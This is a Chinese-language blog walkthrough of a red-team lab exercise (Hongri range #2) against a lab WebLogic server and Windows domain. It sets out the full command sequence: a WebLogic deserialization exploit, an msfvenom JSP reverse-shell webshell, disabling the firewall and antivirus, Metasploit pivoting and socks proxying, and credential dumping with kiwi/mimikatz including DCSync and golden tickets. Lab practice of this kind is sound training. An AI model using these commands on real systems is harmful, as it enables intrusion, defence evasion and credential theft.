0
点赞
收藏
分享

微信扫一扫

ATT&CK红队评估(红日靶场二)

在觉 2022-04-13 阅读 36

靶场搭建

靶场下载地址:漏洞详情

一共有三台主机:WEB、DC、PC

WEB主机有两张网卡,第一张网卡NAT,第二张网卡选择一个仅主机模式的网络(vmvare可以通过编辑里的虚拟网络编辑器进行添加或修改网络)这里我选择的是创建的仅主机vmnet15网络

DC主机只有一张网卡,选择和WEB第二章网卡一样的vmnet15网络

PC有两张网卡,配置和WEB主机一样,第一张网卡NAT,第二张网卡vmnet15

网络设置完成后进行开机

WEB主机以administrator第一次登录时没有密码,登录后会要求重新设置密码

其它两台主机默认登录密码为1qaz@WSX

WEB主机

PC主机

DC主机

KALI主机

DC:   delay\delay   10.10.10.10

PC:   delay\mssql   10.10.10.201  192.168.111.201

WEB:delay\Administrator  10.10.10.80  192.168.111.80

Kali: 192.168.111.136

WEB主机进入C:\Oracle\Middleware\user_projects\domains\base_domain\bin

以管理员身份运行strartWebLogic.cmd

环境搭建完毕

渗透测试

首先用nmap扫描一下目标IP

nmap -sS -sV -Pn -T4 192.168.111.80

-sS代表使用半开式SYN扫描,这种扫描方式很少在目标主机上留下扫描日志

-sV代表版本探测,探测服务的版本

-Pn代表穿过防火墙扫描

-T4代表扫描时间间隔,设置速度等级,0-5级,数字越大,扫描时间间隔越小,速度就越快。(T0-T2串行扫描,T3-T5并行扫描)

445端口开放意味着存在smb服务,可能存在ms17_010永恒之蓝漏洞。

7001端口说明目标IP存在weblogic服务可能存在反序列化,SSRF,任意文件上传,后台路径泄露

开放139端口,就存在Samba服务,就可能存在爆破/未授权访问/远程命令执行漏洞

放1433端口,就存在mssql服务,可能存在爆破/注入/SA弱口令。

开放3389端口,就存在远程桌面。

先看看weblogic是否存在漏洞

使用weblogicscan工具扫描

python WeblogicScan.py -u 192.168.111.80 -p 7001

两个工具扫描可以更准确地扫描出漏洞

扫描结果显示,存在两个CVE漏洞,都是反序列化,CVE-2017-3506、CVE-2019-2725

存在后台路径,还存在一个SSRF漏洞

开始利用

利用JAVA反序列化工具获得shell

msf生成木马

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.111.136 LPORT=4444 -f jsp > /root/test.jsp

上传木马

路径选择

1、把shell写到控制台images目录中

\Oracle\Middleware\wlserver_10.3\server\lib\consoleapp\webapp\framework\skins\wlsconsole\images\shell.jsp 目录上传木马

访问

http://*.*.*.*:7001/console/framework/skins/wlsconsole/images/shell.jsp

2、写到uddiexplorer目录中

\Oracle\Middleware\user_projects\domains\base_domain\servers\AdminServer\tmp\_WL_internal\uddiexplorer\随机字符\war\shell.jsp 目录写入木马

C:\Oracle\Middleware\user_projects\domains\base_domain\servers\AdminServer\tmp_WL_internal\uddiexplorer\5f6ebw\war\shell.jsp

访问

http://*.*.*.*:7001/uddiexplorer/shell.jsp

http://192.168.111.80:7001/uddiexplorer/shell.jsp

3:在应用安装目录中\Oracle\Middleware\user_projects\domains\application\servers\AdminServer\tmp\_WL_user\项目名\随机字符\war\shell.jsp 目录写入木马

访问 http://*.*.*.*:7001/项目名/shell.jsp

我这里选择第一种

访问木马文件

 

Matesploit开启监听,访问shell.jsp,获得回话,administrator权限

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

getsystem提权失败,应该是有杀软和防火墙的原因

查看补丁

乱码使用chcp 65001

ps查看进程,发现有某60

getpid查看进程号,这个进程号很容易被发现

进程迁移到system权限进程services

services.exe是微软windows操作系统的一部分。用于管理启动和停止服务

migrate 512

进程迁移后是system权限

netsh advfirewall set allprofiles state off 关闭防火墙

run killav 关闭杀软

内网渗透

ipconfig /all发现存在内网网段:10.10.10.0/24

run post/windows/gather/enum_domain 查看域控

run post/windows/gather/enum_ad_computers查看域内成员

新建路由

run post/multi/manage/autoroute

查看路由

run autoroute -p

background挂起会话

只增加route只能使用matesploit工具,要想使用其它工具就要建立反向代理

(正向代理就是指内网机器如果不能直接连到外网,建立正向代理可以连到外网,

而反向代理则相反,是外网主机想要进入内网建立的代理)

use auxiliary/server/socks_proxy

set SRVHOST 127.0.0.1

set VERSION 4a

exploit

执行之后后台会挂起一个jobs

使用命令jobs可以插查看

修改proxychains4.conf

vim /etc/proxychains4.conf

探测内网存活主机

use post/windows/gather/arp_scanner

扫描发现10.10.10.10主机,之前已经得知10.10.10.10时域控

发现主机10.10.10.201

net user /domain 查看域用户

load mimikatz 加载mimikatz

在新版msf中mimikatz已经被kiwi替代

load kiwi 加载kiwi

help kiwi 获取kiwi帮助信息

creds_all:列举所有凭据

creds_kerberos:列举所有kerberos凭据

creds_msv:列举所有msv凭据

creds_ssp:列举所有ssp凭据

creds_tspkg:列举所有tspkg凭据

creds_wdigest:列举所有wdigest凭据

dcsync:通过DCSync检索用户帐户信息

dcsync_ntlm:通过DCSync检索用户帐户NTLM散列、SID和RID

golden_ticket_create:创建黄金票据

kerberos_ticket_list:列举kerberos票据

kerberos_ticket_purge:清除kerberos票据

kerberos_ticket_use:使用kerberos票据

kiwi_cmd:执行mimikatz的命令,后面接mimikatz.exe的命令

lsa_dump_sam:dump出lsa的SAM

lsa_dump_secrets:dump出lsa的密文

password_change:修改密码

wifi_list:列出当前用户的wifi配置文件

wifi_list_shared:列出共享wifi配置文件/编码

获取明文密码 load_all

使用nmap扫描端口开放(注意这里要加上proxychains,使用代理扫描)

proxychains nmap -sT -Pn -sV 10.10.10.10

-sT是指使用TCP扫描,这种方式会在目标主机中留下大量探测记录

可以使用-sS,使用半开放SYN扫描,这样就不会留下大量探测记录,但是这里用-sS会显示路由错误,探测不到10.10.10.10,用-sT就没问题,应该是因为目标主机开启了SYN攻击保护

proxychains nmap -sT -Pn -sV 10.10.10.10

proxychains nmap -sT -Pn -sV 10.10.10.201

横向移动

利用rdesktop(3389rdp远程连接)

rdesktop 192.168.111.80

账号和密码之前通过kiwi收集到了

因为其它两台主机都开启了3389,所以可以 以192.168.111.80作为跳板连接其它两台主机

举报

相关推荐

0 条评论